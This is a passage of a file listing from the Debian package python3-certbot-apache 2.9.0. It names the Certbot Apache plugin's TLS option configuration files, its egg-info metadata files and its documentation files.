/usr/lib/python3/dist-packages/certbot_apache/_internal/tls_configs/current-options-ssl-apache.conf /usr/lib/python3/dist-packages/certbot_apache/_internal/tls_configs/old-options-ssl-apache.conf /usr/lib/python3/dist-packages/certbot_apache/py.typed /usr/lib/python3/dist-packages/certbot_apache-2.9.0.egg-info /usr/lib/python3/dist-packages/certbot_apache-2.9.0.egg-info/PKG-INFO /usr/lib/python3/dist-packages/certbot_apache-2.9.0.egg-info/dependency_links.txt /usr/lib/python3/dist-packages/certbot_apache-2.9.0.egg-info/entry_points.txt /usr/lib/python3/dist-packages/certbot_apache-2.9.0.egg-info/requires.txt /usr/lib/python3/dist-packages/certbot_apache-2.9.0.egg-info/top_level.txt /usr/share /usr/share/doc /usr/share/doc/python3-certbot-apache /usr/share/doc/python3-certbot-apache/changelog.Debian.gz /usr/share/doc/python3-certbot-apache/copyright